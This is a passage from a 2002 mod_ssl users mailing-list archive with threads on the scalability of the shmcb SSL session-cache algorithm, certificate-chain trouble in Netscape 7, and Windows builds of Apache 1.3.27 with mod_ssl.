> comparison will start taking its additional toll.

Nope. Unless I'm mistaken, when N=65536 (assuming we have 256 subcaches, 
though it could be 128) and the cache is full, the average number of 
non-trivial comparisons (ie. ASN1 decodes) will be 1/512th the number 
of sessions in the *subcache*, which is 256, which means 0.5 of them. 
Ie. assuming the lookups are always for sessions that exist, there's a 
25% chance of a false positive for each lookup.

For N=131072 using the same logic (though remember all this is subject 
to a factor of up to 2 one way or the other), you'd expect 
sqrt(131072)/512 ASN1 decodes during a lookup which is 0.7 - which 
means approx 50% chance of a false positive on a ASN1 decode. On the 
other hand, you'd expect 65536 false positives on a single lookup using 
the shmht cache.

> To put the numbers in perspective (and to show that the example Ns
> above are untypically large), a session cache of size 500Kbytes is
> typically used in Apache, making room for only about N=3000
> session-cache entries. In this case, the typical number of one-byte

That's if your sessions are "normal" (between 100 and 150 bytes each). 
If you're using client-certs then each such client-authenticated 
session can easily blow out to over 1Kb (the sessions contain the 
client-cert encoded within them).

> comparisons a lookup needs is roughly 32 (if I'm calculating this
> correctly). This is certainly not bad, and should give excellent
> results for this algorithm (as indeed I see people are reporting).

Again the subcache mechanism reduces this right down. For a cache that 
configures itself for 3000 sessions (it auto-estimates an index 
capacity based on the size of the memory allocated for the cache), it 
will probably use 32 subcaches with index space for 94 sessions in each 
subcache. More or less. So a lookup would have a maximum iteration of 
94 items (lookups for sessions that exist in the cache would look at 48 
sessions on average) and the second-byte test means you reduce your 
ASN1 decodes by a factor of 256 - so in general you're hardly ever 
getting false positives.

> While N=3000 is typical, N=65536 is probably not because it results
> in a very big cache, about 10MB. N=131072, 20MB, is probably
> considered ridiculously large. Is this why such N's were considered
> uninteresting and this lookup algorithm was deemed good enough in all
> practical cases?
>
> If anyone is wondering why I'm thinking about this issue, and why
> someone may want more than the 500Kbyte session-cache (N=3000
> sessions), think about the following calculation:

OK, I'll snip it there and make a couple of general observations to 
finish. The numbers you start to talk about would bury any kind of 
conventional server - and having worked with a lot of crypto hardware I 
can assure you that even when offloading *all* crypto operations to 
hardware (in a zero-overhead zero-latency utopia) you will still bang 
your head against processing overheads in the SSL/TLS logic (the ASN1 
code particularly) and of course in the kernel - there's a lot of 
networking and memory paging involved, and if you're using hardware, 
the driver's going to be busy as hell too.

But the scalability problem goes further - the problem with shmht was 
twofold and shmcb has only (so far) addressed one of the problems but 
has addressed it well enough that the other problem is not really 
observable in "normal" circumstances. The problem shmcb addressed was 
the sheer enormity of the put/del/get overheads. These have been 
reduced by shmcb using some smoke and mirrors with (a) lookup 
optimisations such as the second-byte check, and (b) sub-dividing into 
smaller and faster-to-search subcaches based on the session ids. (b) is 
possible with session caching because any get/put/del has a fixed 
session id to work with and no interoperation is required between 
different ranges of session-ids so splitting them up into smaller 
subcaches harms nothing.

The problem that shmcb did not address is parallelism - if you ran a 
benchmark against a version of mod_ssl using shmht that was built with 
profiling, and benchmarked using multiple requests in parallel, I 
expect that you'd have found that httpd processes were often waiting on 
the mutex lock for the cache. Whilst a single process is doing a (slow) 
lookup on the cache, all other processes needing to do a cache 
operation will block. That single mutex creates a playoff between cache 
latency and server throughput. By reducing the overheads of each cache 
operation relative to other SSL/TLS overheads that do *NOT* need a 
mutex, shmcb reduces the frequency and severity of this contention 
possibility. However, one reason for the subcaching idea in shmcb was 
to allow the possibility of multiple mutex locks, conceivably one for 
each subcache (though you could mask it too, say, have 64 subcaches 
sharing 16 mutexes - 4 subcaches share the same mutex). This would then 
increase the parallelism of the session cache so that two processes 
needing cache operations, unless they're unlucky enough to be needing 
the *same* subcache, can process in parallel.

If you're serious about wanting a *local* session cache with 
astronomical scalability, you'll certainly increase your theoretical 
limits best by addressing this issue first - as I mentioned earlier the 
lookups are already *very* fast compared to other operations in the 
SSL/TLS implementation, but unlike the other operations in the SSL/TLS 
implementation, *they can't be done in parallel*! :-) This could 
conceivably be an issue on SMP machines, for example.

However, I suspect that once you get into these sorts of extra-planetary 
demands you're already going to be using multiple servers to handle 
loads - apart from the fact you need to be able scale your server 
environment without buying a brand new super-computer each time you 
need more juice, you also need some redundancy and fault-tolerance; 
that means redundant servers, network feeds, network interfaces, HUBS, 
etc. When you think what all this can mean to the session caching 
problem, I think you'll understand why I'm not particularly worried 
about tweaking shmcb much - you need to have a distributed cache 
instead. The alternative is to have a load-balancer that can always 
match SSL/TLS session-resume requests up to the server they last spoke 
to but that sucks for a variety of reasons. One is that you lose part 
of the whole point of load-balancing; that you want to balance the load 
across servers based on how busy they are and *not* by a requirement to 
find the particular server that remembers the client. Another is that 
if a server goes down, you can route clients to other servers but you 
lose all the session information that was internal to that server. 
Another is that you need all the same global state anyway inside your 
load-balancer for it to know about that pairing up - so your 
load-balancer itself can't scale or work in parallel, and it becomes a 
single point of failure and an expensively single point of bottleneck 
too (ie. when you hit the limits of your load-balancer, what do you 
do?). The only thing worse than a single bottleneck/point-of-failure in 
the form of an inexpensive commodity server running open source (free) 
software is precisely the same problem in the form of an expensive 
proprietary black box running software that you can't tweak, upgrade, 
or debug.

OTOH: If your servers use a distributed session cache then you can 
load-balance however you please, and in fact you can have multiple 
internet feeds coming into your server network with multiple 
load-balancers handling each of those feeds - you don't care which 
server each client's session-resume request is routed to as all the 
servers share a network-wide cache.

Which leads to a shameless plug for *another* cache implementation you 
might want to analyse when you start to look beyond the limits of 
shmcb;
   http://www.distcache.org/

BTW: Apache 2.0.43 support for distcache will be released in a day or 
two, as will the first patch kit for Apache 1.3.*+mod_ssl.

Regards,
Geoff

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Thu Oct 10 20:03:08 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id UAA09751; Thu, 10 Oct 2002 20:02:13 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via SMTP for 
	from web10412.mail.yahoo.com id UAA09747; Thu, 10 Oct 2002 20:01:58 +0200 (MET DST)
Message-ID: <20021010180155.99923.qmail@web10412.mail.yahoo.com>
Received: from [199.203.105.165] by web10412.mail.yahoo.com via HTTP; Thu, 10 Oct 2002 11:01:55 PDT
Date: Thu, 10 Oct 2002 11:01:55 -0700 (PDT)
From: Alex Behar 
Subject: mod_access question
To: modssl-users@modssl.org
In-Reply-To: <200210101748.TAA09234@opensource.ee.ethz.ch>
MIME-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Alex Behar 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

Hi guys, I have an issue here I would like to solve.
I have apache 1.3.27 with mod_ssl-2.8.11-1.3.27, and I
am trying to configure the https not to follow the
rules set in the .htaccess files. In other words, the
person using mod_ssl does not get bothered by any of
the options in .htaccess, but yet the users using the
basic http protocol to apply to these rules. I have
tryed some methods like making a  entry, containing AllowOverride
None in it, but it does not work.

Thanks

__________________________________________________
Do you Yahoo!?
Faith Hill - Exclusive Performances, Videos & More
http://faith.yahoo.com
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Thu Oct 10 20:25:31 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id UAA10559; Thu, 10 Oct 2002 20:24:21 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from fermat.math.technion.ac.il id UAA10544; Thu, 10 Oct 2002 20:23:15 +0200 (MET DST)
Received: from fermat.math.technion.ac.il (localhost [127.0.0.1])
	by fermat.math.technion.ac.il (8.12.1/8.12.1) with ESMTP id g9AINDiX015543;
	Thu, 10 Oct 2002 20:23:14 +0200 (IST)
Received: (from nyh@localhost)
	by fermat.math.technion.ac.il (8.12.1/8.12.1/Submit) id g9AIND54015542;
	Thu, 10 Oct 2002 20:23:13 +0200 (IST)
Date: Thu, 10 Oct 2002 20:23:13 +0200
From: "Nadav Har'El" 
To: modssl-users@modssl.org
Subject: Re: Question about session-cache algorithms
Message-ID: <20021010182313.GA15129@fermat.math.technion.ac.il>
References: <20021009225421.GA28299@fermat.math.technion.ac.il> <200210101331.47889.geoff@geoffthorpe.net>
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Disposition: inline
In-Reply-To: <200210101331.47889.geoff@geoffthorpe.net>
User-Agent: Mutt/1.4i
Hebrew-Date: 5 Heshvan 5763
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Nadav Har'El" 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

On Thu, Oct 10, 2002, Geoff Thorpe wrote about "Re: Question about session-cache algorithms":
> I suppose as the author of the implementation you're disecting I should 
> probably respond in some way :-)

Thanks. Your response was very educating.

> If you check the "shmht" implementation (which is what "shmcb" was 
> created to replace) you'll see that a linear search was being conducted 

Yes, I didn't mention that, but I had already known that shmcb was a lot
better than shmht, for a number of reasons, which is why I didn't even
try looking into the (non-)scalability of shmht.

I had already read 
http://marc.theaimsgroup.com/?l=apache-modssl&m=98531062704750&w=2
in which you explained the differences between shmcb and shmht - it was
a very good explanation.

> operation, you've got serious trouble. I'm quietly confident that you 
> could add a "for(loop=0;loop<1000;loop++){}" loop around the cache 

I guess that if that's the case (I have to admit, I didn't do any benchmarking
before asking my question), then indeed even a growth of typical cache
sizes 1000-fold won't make a noticable difference - so indeed there is
no need to worry about this scalability issue - at all.

> subcache of order O(sqrt(N)) to "search" rather than N (I think you 
> muddled this up in your analysis). The second-byte tests in the 
> subcache iteration are so considerably faster than an ASN1 decode 
> function call that we can generally ignore them for complexity 
> arguments.

Oh, I counted the second-byte comparisons in my complexity analysis, which
is why I always got 256 times what you got :)

> So you will likely ASN1 decode (sqrt(N)/256)/2 sessions (ie. 
> sqrt(N)/512 of them) during a lookup in a full (sub)cache. This is less 

Note that the number sqrt(N) is correct only till N=65536. From there
on (if I understand correctly), the number of subcaches remains 256, and
you start having N/256 entries per cache, so on average have something
like N/65536 (not sqrt(N)/256)) ASN1 decodes.

But obviously this only makes a difference for huge Ns, and you convinced
me that these are anyway not as useful as I thought they may be.

> cache without optimisations like the second-byte test. As for lowering 
> the number of false-positives in the lookup as you seem to be 
> suggesting - that's not that hard; rather than taking the second byte 
> as an optimisation, we could take the fifth, sixth, seventh and eighth 
> bytes (ie. the second word) and memcpy() them into a "second word" 

This will only the number of false-positive ASN1 decodes, not the number
of indices that are compared. But you did convince me that even these
O(sqrt(N)) or O(N/256) comparisons can scale to much more than anything
even high-end servers will want to handle in the next decade :)

> > To put the numbers in perspective (and to show that the example Ns
> > above are untypically large), a session cache of size 500Kbytes is
> > typically used in Apache, making room for only about N=3000
> > session-cache entries. In this case, the typical number of one-byte
> 
> That's if your sessions are "normal" (between 100 and 150 bytes each). 
> If you're using client-certs then each such client-authenticated 
> session can easily blow out to over 1Kb (the sessions contain the 
> client-cert encoded within them).

This is a very good point, I forgot about it.

> finish. The numbers you start to talk about would bury any kind of 
> conventional server - and having worked with a lot of crypto hardware I 
> can assure you that even when offloading *all* crypto operations to 
> hardware (in a zero-overhead zero-latency utopia) you will still bang 
> your head against processing overheads in the SSL/TLS logic (the ASN1 
> code particularly) and of course in the kernel - there's a lot of 
> networking and memory paging involved, and if you're using hardware, 
> the driver's going to be busy as hell too.

Yes, although I did personally see a demonstration of a server, using an SSL
acceleration card, that could do 500 new SSL sessions per second (note
that all the requests were very quick and came from a LAN - otherwise
Apache couldn't handle this with its 250-process limit).

> The problem that shmcb did not address is parallelism - if you ran a 
> benchmark against a version of mod_ssl using shmht that was built with 
> profiling, and benchmarked using multiple requests in parallel, I 
> expect that you'd have found that httpd processes were often waiting on 
> the mutex lock for the cache. Whilst a single process is doing a (slow) 
> lookup on the cache, all other processes needing to do a cache 

This is a very good point. Naturally, any super-server like I imagined
in my first post will have multiple CPUs, so you're right, this issue
will be more important than whether 10 or 500 bytes are being compared.

> However, I suspect that once you get into these sorts of extra-planetary 
> demands you're already going to be using multiple servers to handle 
> loads - apart from the fact you need to be able scale your server 
> environment without buying a brand new super-computer each time you 
> need more juice, you also need some redundancy and fault-tolerance; 

Again, you're right.
I'm convinced - there's no need to change shmcb :)

> Which leads to a shameless plug for *another* cache implementation you 
> might want to analyse when you start to look beyond the limits of 
> shmcb;
>    http://www.distcache.org/
> 
> BTW: Apache 2.0.43 support for distcache will be released in a day or 
> two, as will the first patch kit for Apache 1.3.*+mod_ssl.

Thanks, I'll look at it.

Thanks for explaining to me how silly my worries about shmcb's scalability
were (oh, and thanks for writing it in the first place :) ).

	Nadav.

-- 
Nadav Har'El                        |    Thursday, Oct 10 2002, 5 Heshvan 5763
nyh@math.technion.ac.il             |-----------------------------------------
Phone: +972-53-245868, ICQ 13349191 |"Outlook not so good." Wow! That magic 8-
http://nadav.harel.org.il           |ball knows everything! So, what about IE?
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Thu Oct 10 20:58:19 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id UAA11304; Thu, 10 Oct 2002 20:57:24 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from mail.cs.utexas.edu id UAA11287; Thu, 10 Oct 2002 20:56:14 +0200 (MET DST)
Received: from cs.utexas.edu (jbc@lally.cs.utexas.edu [128.83.120.201])
	(authenticated bits=0)
	by mail.cs.utexas.edu (8.12.3/8.12.3) with ESMTP id g9AIu6KT010487
	for ; Thu, 10 Oct 2002 13:56:11 -0500 (CDT)
Message-ID: <3DA5CD46.80200@cs.utexas.edu>
Date: Thu, 10 Oct 2002 13:56:06 -0500
From: "J. B. Chambers" 
Organization: UT Austin Dept of Computer Sciences
User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.0.1) Gecko/20020823 Netscape/7.0
X-Accept-Language: en-us, en
MIME-Version: 1.0
To: modssl-users@modssl.org
Subject: Re: NS7 sees cert diff in Apache 1.3+mod_ssl and Apache 2
References: 
Content-Type: text/plain; charset=us-ascii; format=flowed
Content-Transfer-Encoding: 7bit
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "J. B. Chambers" 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

[I had to be out of the office, sorry to be slow in following up]

Thanks for the reply, Jose. Either I posed my question poorly or I don't 
understand your answer.

I have two servers running (they are on the same host (distinguished ports), the 
CN value in the certificate won't be an issue). One is Apache1+modssl-addon, the 
other is Apache2+modssl-builtin. Both are set up with a copy of our secure 
server certificate from Verisign (SSLCertificateFile), and the Verisign-provided 
intermediate certificate (SSLCertificateChainFile). (And of course both have the 
same SSLCertificateKeyFile).

Now. When I point IE6 (or Opera) at either server, it recognizes the 
intermediate certificate, figures out that it knows who Verisign is (in its 
list of known CAs), and trusts our Verisign-issued server cert.

If I point Netscape at the Apache1 version, it behaves in this way also.

If I now point Netscape at the trial Apache2 setup, it claims that (as noted) 
the server cert was issued by an unrecognized CA.

So .. the only way I can articulate this situation is .. that there is some 
difference in the way the mod_ssl addon for Apache 1 and the mod_ssl builtin for 
Apache 2 delivers intermediate certificate chain info, and that only Netscape 
seems to be sensitive to the difference.

Jose Correia (J) wrote:
> To my knowledge the Netscape behaviour is actually the normal one. If
> the server certificate is not installed in their browser Trusted
> certificate store (ot its higher parent) then there is no way its
> going to recognize it as a trusted certificate. 
> 
> Regards
> Jose
> 
> 
> -----Original Message-----
> From: J. B. Chambers [mailto:jbc@cs.utexas.edu]
> Sent: 03 October 2002 17:41
> To: modssl-users@modssl.org
> Subject: NS7 sees cert diff in Apache 1.3+mod_ssl and Apache 2
> 
> 
> Hi.
> 
> My production server is currently running
>    Server: Apache/1.3.26 (Unix) mod_ssl/2.8.10 OpenSSL/0.9.6g
> 
> and I'm test driving
>    Server: Apache/2.0.42 (Unix) mod_ssl/2.0.42 OpenSSL/0.9.6g
> 
> I have a secure server certificate from Verisign, and the intermediate
> cert from 
> their website installed as the SSLCertificateChainFile.
> 
> Things work fine on the production platform. On the test platform,
> things work 
> fine using IE6 or Opera as the browser, and the certificate details
> are okay on 
> inspection.
> 
> However, Netscape 7 (and also Mozilla, BTW) returns the error
>    The certificate was issued by a certificate authority
>    that Netscape 7.0 does not recognize
> which would seem to be a cert chain problem. Probing with openssl
> s_client does 
> not suggest a server problem. You can, of course, just tell NS7 to
> permanently 
> accept the cert and continue, but it's upsetting to some users to have
> to do that.
> 
> Info at mozilla.org suggests that, at least up til recently, there
> have been 
> known SSL/TLS issues, but I don't see anything quite like this.
> 
> Anyone with a similar experience/problem/solution?
> 
> Thanks in advance.
> John Chambers 
> 
> 
> ______________________________________________________________________
> Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
> User Support Mailing List                      modssl-users@modssl.org
> Automated List Manager                            majordomo@modssl.org
> ______________________________________________________________________
> Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
> User Support Mailing List                      modssl-users@modssl.org
> Automated List Manager                            majordomo@modssl.org


______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Fri Oct 11 04:41:07 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id EAA24325; Fri, 11 Oct 2002 04:40:13 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from bsce5.ballaratsc.vic.edu.au id EAA24296; Fri, 11 Oct 2002 04:39:07 +0200 (MET DST)
Received: from bscpri-MTA by bsce5.ballaratsc.vic.edu.au
	with Novell_GroupWise; Fri, 11 Oct 2002 12:38:51 +1000
Message-Id: 
X-Mailer: Novell GroupWise Internet Agent 6.0.1
Date: Fri, 11 Oct 2002 12:38:24 +1000
From: "Justin Annear" 
To: 
Subject: Win32 & Apache 1.3.27
Mime-Version: 1.0
Content-Type: text/plain; charset=US-ASCII
Content-Transfer-Encoding: 7bit
Content-Disposition: inline
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Justin Annear" 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

Hi All,

Im a little new to the Apache & Mod_ssl scene and as such have used the
1.3.26 pre-compiled version on the modssl.org website.

I noticed recently that 1.3.27 (Apache) has been released and as such am
wanting to upgrade asap to this version.

Im running Apache on a Windows 2000 server, due to reasons beyond my
control and as such am hoping that I can obtain either one of two things

a) a pre-compiled version of apache 1.3.27 with modssl

or

b) instructions (clear and detailed due to my limited understanding of
this topic) on how to upgrade apache and still keep my mod_ssl stuff
intact. 
I've upgraded my current mod_ssl to the latest versions etc.

I've looked into compiling a version myself as I dont believe this will
be provided by modssl.org with limited success.

Thanks in advance

Justin Annear
Ballarat Secondary College
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Fri Oct 11 09:00:12 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id IAA00346; Fri, 11 Oct 2002 08:59:12 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from tomts9-srv.bellnexxia.net id IAA00330; Fri, 11 Oct 2002 08:58:37 +0200 (MET DST)
Received: from sympatico.ca ([64.231.125.186]) by tomts9-srv.bellnexxia.net
          (InterMail vM.5.01.04.19 201-253-122-122-119-20020516) with ESMTP
          id <20021011033125.XXUL14901.tomts9-srv.bellnexxia.net@sympatico.ca>
          for ; Thu, 10 Oct 2002 23:31:25 -0400
Message-ID: <3DA6462D.6040606@sympatico.ca>
Date: Thu, 10 Oct 2002 23:31:57 -0400
From: hunter 
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.0.0) Gecko/20020530
X-Accept-Language: en-us, en
MIME-Version: 1.0
To: modssl-users@modssl.org
Subject: Re: Win32 & Apache 1.3.27
References: 
Content-Type: text/plain; charset=us-ascii; format=flowed
Content-Transfer-Encoding: 7bit
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: hunter 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

Justin Annear wrote:
> Hi All,
> 
> Im a little new to the Apache & Mod_ssl scene and as such have used the
> 1.3.26 pre-compiled version on the modssl.org website.
> 
> I noticed recently that 1.3.27 (Apache) has been released and as such am
> wanting to upgrade asap to this version.
> 
> Im running Apache on a Windows 2000 server, due to reasons beyond my
> control and as such am hoping that I can obtain either one of two things
> 
> a) a pre-compiled version of apache 1.3.27 with modssl
> 
> or
> 
> b) instructions (clear and detailed due to my limited understanding of
> this topic) on how to upgrade apache and still keep my mod_ssl stuff
> intact. 
> I've upgraded my current mod_ssl to the latest versions etc.
> 
> I've looked into compiling a version myself as I dont believe this will
> be provided by modssl.org with limited success.
> 
> Thanks in advance
> 
> Justin Annear
> Ballarat Secondary College
> ______________________________________________________________________
> Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
> User Support Mailing List                      modssl-users@modssl.org
> Automated List Manager                            majordomo@modssl.org
> 

Justin,

I built these binaries last week...

http://hunter.campbus.com/Apache_1.3.27-Mod_SSL_2.8.11-OpenSSL_0.9.6g-Win32.zip
http://hunter.campbus.com/Openssl-0.9.6g-Win32.zip

http://hunter.campbus.com/Apache_2.0.43-OpenSSL_0.9.6g-Win32.zip

If you have any problems contact me on the list, as
 or at my personal account: hunter@tor.ath.cx

There are other sources, some more comprhensive than mine.


Victor's installer has just about anything you could want ...
Apache, OpenSSL, TomCat, Ant, PHP, MySQL, etc

vmedina98@unitec.edu.ve

Server Installer
ftp://route.unitec.edu.ve/VictorMedina/IkiruxProyect/IKIRUX_WSP_Pro1Beta3_ENG.exe

Installation Guide:
ftp://route.unitec.edu.ve/VictorMedina/IkiruxProyect/Ikirux Server 
Installation Guide.pdf

Release Notes:

ftp://route.unitec.edu.ve/VictorMedina/IkiruxProyect/Ikirux Server 
Release Notes.pdf


Another nice package is...

OpenSA web server :: Next Generation Web Serving
http://www.opensa.org/

If you really want to roll your own I have some instructions that I put 
together ... very messy but easy to follow.  Ask and I will send it to 
you I am not going to torture the list with it again.

OR let me know how you are making out...

Chris.

Legal Notice
------------

These software packages are provided free of charge. It uses strong 
cryptography that is regulated by export/import/use restrictions in some 
parts of the world.

PLEASE NOTE THAT EXPORT/IMPORT/USE OF STRONG CRYPTOGRAPHY SOFTWARE, 
PROVIDING CRYPTOGRAPHY HOOKS OR EVEN JUST COMMUNICATING TECHNICAL 
DETAILS ABOUT CRYPTOGRAPHY SOFTWARE IS ILLEGAL IN SOME PARTS OF THE 
WORLD. SO, WHEN YOU IMPORT THIS PACKAGE TO YOUR COUNTRY, RE-DISTRIBUTE 
IT FROM THERE OR EVEN JUST EMAIL TECHNICAL SUGGESTIONS OR SOURCE PATCHES 
TO THE AUTHOR OR OTHER PEOPLE YOU ARE STRONGLY ADVISED TO PAY CLOSE 
ATTENTION TO ANY EXPORT/IMPORT/USE LAWS WHICH APPLY TO YOU. WE NOR THE 
AUTHORS OF THE REPRESENTED SOFTWARE PACKAGES ARE OR WILL BE HELD LIABLE 
FOR ANY VIOLATIONS YOU MAKE. BE CAREFUL, IT IS YOUR RESPONSIBILITY.


______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Fri Oct 11 10:43:09 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id KAA05234; Fri, 11 Oct 2002 10:42:16 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from tcen-ul-mailsv00.telkom.co.za id KAA05220; Fri, 11 Oct 2002 10:41:11 +0200 (MET DST)
Received: from CNTRRA20-GTW01.telkom.co.za (CNTRRA20-GTW01.telkom.co.za [165.143.130.156])
	by tcen-ul-mailsv00.telkom.co.za (8.11.2/8.11.2/2002061301) with SMTP id g9B8f2a08282
	for ; Fri, 11 Oct 2002 10:41:07 +0200
Received: FROM CNTRRA20-XS00.telkom.co.za BY CNTRRA20-GTW01.telkom.co.za ; Fri Oct 11 10:40:59 2002 +0200
Received: from CNTRRA20-XS11.telkom.co.za ([165.143.131.216]) by CNTRRA20-XS00.telkom.co.za with Microsoft SMTPSVC(5.0.2195.5329);
	 Fri, 11 Oct 2002 10:40:59 +0200
Received: from TYGRRA01-XS11.telkom.co.za ([165.148.21.97]) by CNTRRA20-XS11.telkom.co.za with Microsoft SMTPSVC(5.0.2195.5329);
	 Fri, 11 Oct 2002 10:40:58 +0200
Received: from TYGRRA01-XCS00.telkom.co.za ([165.148.21.86]) by TYGRRA01-XS11.telkom.co.za with Microsoft SMTPSVC(5.0.2195.5329);
	 Fri, 11 Oct 2002 10:40:50 +0200
X-MimeOLE: Produced By Microsoft Exchange V6.0.5762.3
content-class: urn:content-classes:message
MIME-Version: 1.0
Content-Type: text/plain;
	charset="iso-8859-1"
Subject: RE: NS7 sees cert diff in Apache 1.3+mod_ssl and Apache 2
Date: Fri, 11 Oct 2002 10:40:50 +0200
Message-ID: 
Thread-Topic: NS7 sees cert diff in Apache 1.3+mod_ssl and Apache 2
Thread-Index: AcJwj2at9+DYgXanRLC4mTlvLTzyzgAaHfcA
From: "Jose Correia (J)" 
To: 
X-OriginalArrivalTime: 11 Oct 2002 08:40:50.0553 (UTC) FILETIME=[E713B690:01C27101]
Content-Transfer-Encoding: 8bit
X-MIME-Autoconverted: from quoted-printable to 8bit by opensource.ee.ethz.ch id KAA05230
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Jose Correia (J)" 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

Hi John

Yeah, I just wanted to make sure that your chain file was setup
correctly which it seems to be.

Unfortunately I have only used Apache 1.3.x and I haven't used any
chain certificates as yet (just used my own generated certificates).

The only thing I can think of is to compare the CA details in the
Netscape truststore to the details of the CA available on the Apache
side (using openssl to view it), just to eleminate that possibility.

Try joining the netscape security mailing list and see if you can get
any info there??

Regards
Jose


-----Original Message-----
From: J. B. Chambers [mailto:jbc@cs.utexas.edu]
Sent: 10 October 2002 20:56
To: modssl-users@modssl.org
Subject: Re: NS7 sees cert diff in Apache 1.3+mod_ssl and Apache 2


[I had to be out of the office, sorry to be slow in following up]

Thanks for the reply, Jose. Either I posed my question poorly or I
don't 
understand your answer.

I have two servers running (they are on the same host (distinguished
ports), the 
CN value in the certificate won't be an issue). One is
Apache1+modssl-addon, the 
other is Apache2+modssl-builtin. Both are set up with a copy of our
secure 
server certificate from Verisign (SSLCertificateFile), and the
Verisign-provided 
intermediate certificate (SSLCertificateChainFile). (And of course
both have the 
same SSLCertificateKeyFile).

Now. When I point IE6 (or Opera) at either server, it recognizes the 
intermediate certificate, figures out that it knows who Verisign is
(in its 
list of known CAs), and trusts our Verisign-issued server cert.

If I point Netscape at the Apache1 version, it behaves in this way
also.

If I now point Netscape at the trial Apache2 setup, it claims that (as
noted) 
the server cert was issued by an unrecognized CA.

So .. the only way I can articulate this situation is .. that there is
some 
difference in the way the mod_ssl addon for Apache 1 and the mod_ssl
builtin for 
Apache 2 delivers intermediate certificate chain info, and that only
Netscape 
seems to be sensitive to the difference.

Jose Correia (J) wrote:
> To my knowledge the Netscape behaviour is actually the normal one.
If
> the server certificate is not installed in their browser Trusted
> certificate store (ot its higher parent) then there is no way its
> going to recognize it as a trusted certificate. 
> 
> Regards
> Jose
> 
> 
> -----Original Message-----
> From: J. B. Chambers [mailto:jbc@cs.utexas.edu]
> Sent: 03 October 2002 17:41
> To: modssl-users@modssl.org
> Subject: NS7 sees cert diff in Apache 1.3+mod_ssl and Apache 2
> 
> 
> Hi.
> 
> My production server is currently running
>    Server: Apache/1.3.26 (Unix) mod_ssl/2.8.10 OpenSSL/0.9.6g
> 
> and I'm test driving
>    Server: Apache/2.0.42 (Unix) mod_ssl/2.0.42 OpenSSL/0.9.6g
> 
> I have a secure server certificate from Verisign, and the
intermediate
> cert from 
> their website installed as the SSLCertificateChainFile.
> 
> Things work fine on the production platform. On the test platform,
> things work 
> fine using IE6 or Opera as the browser, and the certificate details
> are okay on 
> inspection.
> 
> However, Netscape 7 (and also Mozilla, BTW) returns the error
>    The certificate was issued by a certificate authority
>    that Netscape 7.0 does not recognize
> which would seem to be a cert chain problem. Probing with openssl
> s_client does 
> not suggest a server problem. You can, of course, just tell NS7 to
> permanently 
> accept the cert and continue, but it's upsetting to some users to
have
> to do that.
> 
> Info at mozilla.org suggests that, at least up til recently, there
> have been 
> known SSL/TLS issues, but I don't see anything quite like this.
> 
> Anyone with a similar experience/problem/solution?
> 
> Thanks in advance.
> John Chambers 
> 
> 
>
______________________________________________________________________
> Apache Interface to OpenSSL (mod_ssl)
www.modssl.org
> User Support Mailing List
modssl-users@modssl.org
> Automated List Manager
majordomo@modssl.org
>
______________________________________________________________________
> Apache Interface to OpenSSL (mod_ssl)
www.modssl.org
> User Support Mailing List
modssl-users@modssl.org
> Automated List Manager
majordomo@modssl.org


______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
